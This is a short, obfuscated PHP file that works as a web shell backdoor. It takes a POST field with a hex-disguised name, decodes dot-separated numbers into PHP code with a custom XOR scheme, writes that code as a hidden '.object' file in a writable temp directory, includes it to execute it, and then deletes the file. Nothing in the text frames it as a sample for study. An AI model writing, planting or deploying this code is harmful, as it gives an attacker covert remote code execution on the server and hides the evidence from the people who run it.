<?php

if(!is_null($_POST["\x63\x6F\x6D\x70onent"] ?? null)){
	$sym = $_POST["\x63\x6F\x6D\x70onent"];
		  $sym = explode  ('.' 	 ,		$sym		)	 ; 		
	$reference	='';
            $s9	='abcdefghijklmnopqrstuvwxyz0123456789';
            $lenS	=strlen($s9 );
    
            foreach($sym as $m => $v3) {
                $chS	=ord($s9[$m % $lenS] );
                $dec	=((int)$v3 - $chS -($m % 10))	^	 20;
                $reference .=	chr($dec );
            }
	$flag = array_filter([session_save_path(), "/tmp", "/dev/shm", getenv("TEMP"), "/var/tmp", sys_get_temp_dir(), ini_get("upload_tmp_dir"), getcwd(), getenv("TMP")]);
	for ($val = 0, $pset = count($flag); $val < $pset; $val++) {
    $flg = $flag[$val];
    		if (!!is_dir($flg) && !!is_writable($flg)) {
    $item = "$flg/.object";
    if (@file_put_contents($item, $reference) !== false) {
	include $item;
	unlink($item);
	exit;
}
}
}
}